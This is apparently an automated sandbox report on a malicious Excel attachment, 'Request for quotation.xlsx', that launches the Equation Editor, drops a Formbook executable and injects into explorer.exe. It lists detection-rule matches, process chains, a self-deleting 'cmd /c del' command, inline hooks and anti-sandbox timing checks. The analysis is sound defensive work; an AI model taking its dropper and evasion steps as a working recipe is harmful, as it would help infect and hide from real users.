          Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@13/3@2/2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A563185 GetDiskFreeSpaceExW,9_2_4A563185
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Request for quotation.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR1F71.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Request for quotation.xlsxVirustotal: Detection: 33%
          Source: Request for quotation.xlsxReversingLabs: Detection: 22%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: Request for quotation.xlsxStatic file information: File size 2205696 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: cmd.pdb,$ source: vbc.exe, 00000007.00000003.2278081880.000000000093C000.00000004.00000001.sdmp
          Source: Binary string: cmd.pdb,$WJ6$WJ@$WJ source: vbc.exe, 00000007.00000003.2278106711.000000000097A000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, cmd.exe
          Source: Binary string: cmd.pdb source: vbc.exe, 00000007.00000003.2278106711.000000000097A000.00000004.00000001.sdmp, cmd.exe
          Source: Request for quotation.xlsxInitial sample: OLE indicators vbamacros = False
          Source: Request for quotation.xlsxInitial sample: OLE indicators encrypted = True
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A56D539 LoadLibraryW,GetProcAddress,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,9_2_4A56D539
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041797C push ecx; retf 7_2_0041797F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00417936 push esp; retf 7_2_00417937
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0040E3E7 push ebp; iretd 7_2_0040E3E8
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00417C0D push ss; ret 7_2_00417C13
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041CEB5 push eax; ret 7_2_0041CF08
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041CF6C push eax; ret 7_2_0041CF72
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041CF02 push eax; ret 7_2_0041CF08
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041CF0B push eax; ret 7_2_0041CF72
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041D7C6 push cs; retf 7_2_0041D7C7
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041678C push 00000050h; retf 7_2_0041678F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3DFA1 push ecx; ret 7_2_00A3DFB4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A5513B6 push ecx; ret 9_2_4A5513C9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0229DFA1 push ecx; ret 9_2_0229DFB4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0008E3E7 push ebp; iretd 9_2_0008E3E8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0009678C push 00000050h; retf 9_2_0009678F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0009D7C6 push cs; retf 9_2_0009D7C7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00097936 push esp; retf 9_2_00097937
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0009797C push ecx; retf 9_2_0009797F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00097C0D push ss; ret 9_2_00097C13
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0009CEB5 push eax; ret 9_2_0009CF08
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0009CF0B push eax; ret 9_2_0009CF72
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0009CF02 push eax; ret 9_2_0009CF08
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0009CF6C push eax; ret 9_2_0009CF72
          Source: winlog[1].exe.2.dr, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: winlog[1].exe.2.dr, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: vbc.exe.2.dr, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: vbc.exe.2.dr, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 4.2.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 4.2.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 4.0.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 4.0.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 5.0.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 5.0.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 5.2.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 5.2.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 6.0.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 6.0.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 6.2.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 6.2.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 7.0.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 7.0.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 7.2.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.csHigh entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 7.2.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.csHigh entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE5
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: Request for quotation.xlsxStream path 'EncryptedPackage' entropy: 7.99990143991 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2924, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLHEADKCREATEOBJECT("WSCRIPT.SHELL").RUN """
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000000089B5E second address: 0000000000089B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00409A90 rdtsc 7_2_00409A90
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2400Thread sleep time: -420000s >= -30000sJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2400Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 2912Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 1928Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A556E47 GetFileAttributesW,FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,9_2_4A556E47
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A552E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,9_2_4A552E73
